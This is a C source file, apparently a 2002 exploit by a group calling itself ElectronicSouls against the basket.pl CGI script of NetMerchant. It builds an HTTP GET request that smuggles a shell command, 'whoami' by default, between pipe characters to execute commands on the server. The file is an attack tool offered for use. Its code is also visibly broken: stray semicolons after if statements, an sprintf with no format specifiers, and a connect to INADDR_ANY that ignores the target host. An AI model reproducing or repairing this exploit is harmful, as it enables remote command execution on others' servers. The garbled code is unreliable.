/* 
 * PROPERTY OF THE ELECTRONICSOULS CREW !
 * DO NOT DISTRIBUTE !
 * 
 * (C) BrainStorm [ElectronicSouls] 
 * 
 * NetMerchant bug in basket.pl
 * you can execute commands but 
 * 0x20 is filterd!
 *
 * it isnt widely used, but could 
 * be usefull sometime so...
 * ..KEEP THIS PRIVATE !!$&%
 * 
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>


int main(int argc, char **argv[])
{
 struct sockaddr_in dope;
 struct hostent *host;

 char buf[8000];

 int sock, rt, len, STR1, STR2;

  STR1 = argv[2];
  STR2 = argv[3];


  if (argv[1] == 0);
  {
    printf("enter a host \n");
  }

  if (argv[2] == 0);
  {
    STR1 = "/cgi-bin/";
  }
  if (argv[3] == 0);
  {
    STR2 = "whoami";
  }

  host = gethostbyname((void *)argv[1]);
  sock = socket(AF_INET, SOCK_STREAM, 0);

  bzero(&(dope.sin_zero), 8);

  dope.sin_family = AF_INET;
  dope.sin_addr.s_addr = htonl(INADDR_ANY);
  dope.sin_port = htons(80);

  rt = connect(sock, (void *)&dope, sizeof(dope));

  if (rt == -1) 
  {
    perror("Connect..");
    printf("\n");
    exit(1);
  }
   printf("\n\n[ ElectronicSouls ] - NetMerchant basket.pl exploit \n");
   printf("(C) BrainStorm - 2002 \n\n");

   printf("[!] Connected to %s\n", argv[1]);
   memset(&buf, 0, sizeof(buf));
   sprintf(buf, "GET ", STR1, "basket.pl/bigheadshop?|", STR2, "|", "HTTP/1.1\n\n", argv[2], argv[3]);
   printf("[*] Sending exploit string..\n");
   send(sock, buf, sizeof(buf), 0);

   while (1) 
   {
    memset(&buf, 0, sizeof(buf));
    len = sizeof(buf);
     rt = read(sock, &buf, len);

   if (rt <= 0) 
   {
     printf("error!\n"); 
     exit(0); 
   }

   printf("%s\n", buf);
   perror("Status ");
   exit(0);
  }
}